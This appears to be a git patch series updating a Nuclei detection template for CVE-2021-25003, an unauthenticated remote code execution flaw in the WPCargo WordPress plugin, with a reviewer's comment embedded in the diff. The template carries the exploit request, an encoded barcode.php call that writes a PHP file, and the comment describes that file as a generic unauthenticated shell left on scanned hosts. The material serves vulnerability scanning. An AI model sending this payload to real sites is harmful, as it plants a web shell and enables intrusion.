@@ -21,6 +21,10 @@ variables: requests: - raw: + - | + GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + - | GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1 Host: {{Hostname}} @@ -36,8 +40,9 @@ requests: matchers: - type: dsl dsl: - - "status_code_1 == 200" + - "status_code_1 != 200" - "status_code_2 == 200" - - "contains(body_2, md5(num))" - - "contains(body_2, 'PNG')" + - "status_code_3 == 200" + - "contains(body_3, md5(num))" + - "contains(body_3, 'PNG')" condition: and From 4c35bd16380643afbeeebc8f90c8e38bcae6afaf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Nov 2022 11:05:52 +0000 Subject: [PATCH 25/27] Auto Generated New Template Addition List [Fri Nov 4 11:05:52 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index af4e0b3ae3..fbd7e1f691 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2021/CVE-2021-25003.yaml cves/2021/CVE-2021-40661.yaml cves/2022/CVE-2022-22242.yaml cves/2022/CVE-2022-38870.yaml From c564beb92b2ba3f316aa436f8ab4574ecfd4a7b4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Nov 2022 11:24:29 +0000 Subject: [PATCH 27/27] Auto Generated CVE annotations [Fri Nov 4 11:24:29 UTC 2022] :robot: --- cves/2021/CVE-2021-25003.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index 5e9a4530b1..05739f4468 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml 
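Review bot: The new baseline request (`status_code_1 != 200` for `{{randstr}}.php` before it is written) is a good guard against catch-all responders, but it relies on `{{randstr}}` being generated once per template run so that all three requests name the same file; that assumption deserves a comment above the first request, because a per-request value would silently break both the baseline and the final read. The template still leaves `{{randstr}}.php` on every confirmed host with no cleanup request, and from the `?1=var_dump`/`2=` usage it appears to run whatever callable is named in `$_GET[1]` on `$_POST[2]`, i.e. a generic unauthenticated shell. Add a final request that removes it — for instance `?1=unlink` with `2={{randstr}}.php`, if the script's working directory is `includes/` (confirm) — or at least document the artefact in `description:` so operators know to delete it.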
@@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/wpcargo/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25003 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-25003 + cwe-id: CWE-434 metadata: - verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpcargo,unauth + verified: "true" + tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan variables: num: "999999999"